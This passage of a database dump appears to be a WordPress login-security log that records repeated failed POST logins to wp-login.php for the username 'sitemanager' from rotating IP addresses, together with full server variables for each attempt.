5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746030401.828398;s:12:\"REQUEST_TIME\";i:1746030401;}}','103.186.185.28',0,'2025-04-30 21:56:43','1970-01-01 00:00:00'),(94582,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38180\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.207.168\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746031114.2102699;s:12:\"REQUEST_TIME\";i:1746031114;}}','199.188.207.168',0,'2025-04-30 22:08:36','1970-01-01 00:00:00'),(94583,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53854\";s:11:\"REMOTE_ADDR\";s:13:\"66.102.132.28\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746031462.361238;s:12:\"REQUEST_TIME\";i:1746031462;}}','66.102.132.28',0,'2025-04-30 22:14:24','1970-01-01 00:00:00'),(94584,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44782\";s:11:\"REMOTE_ADDR\";s:13:\"95.217.147.97\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746031810.1096721;s:12:\"REQUEST_TIME\";i:1746031810;}}','95.217.147.97',0,'2025-04-30 22:20:11','1970-01-01 00:00:00'),(94585,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43642\";s:11:\"REMOTE_ADDR\";s:12:\"54.39.48.216\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746032153.5050299;s:12:\"REQUEST_TIME\";i:1746032153;}}','54.39.48.216',0,'2025-04-30 22:25:55','1970-01-01 00:00:00'),(94586,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58476\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.122.219\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746032499.80844;s:12:\"REQUEST_TIME\";i:1746032499;}}','68.65.122.219',0,'2025-04-30 22:31:41','1970-01-01 00:00:00'),(94587,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48540\";s:11:\"REMOTE_ADDR\";s:13:\"185.8.173.159\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746032847.9938941;s:12:\"REQUEST_TIME\";i:1746032847;}}','185.8.173.159',0,'2025-04-30 22:37:29','1970-01-01 00:00:00'),(94588,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49834\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.200.133\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746033188.234216;s:12:\"REQUEST_TIME\";i:1746033188;}}','199.188.200.133',0,'2025-04-30 22:43:10','1970-01-01 00:00:00'),(94589,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52216\";s:11:\"REMOTE_ADDR\";s:12:\"91.151.95.70\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746033534.6787169;s:12:\"REQUEST_TIME\";i:1746033534;}}','91.151.95.70',0,'2025-04-30 22:48:56','1970-01-01 00:00:00'),(94590,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49550\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.200.191\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746033879.757081;s:12:\"REQUEST_TIME\";i:1746033879;}}','199.188.200.191',0,'2025-04-30 22:54:41','1970-01-01 00:00:00'),(94591,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42358\";s:11:\"REMOTE_ADDR\";s:14:\"139.162.135.49\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746034222.2918711;s:12:\"REQUEST_TIME\";i:1746034222;}}','139.162.135.49',0,'2025-04-30 23:00:24','1970-01-01 00:00:00'),(94592,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 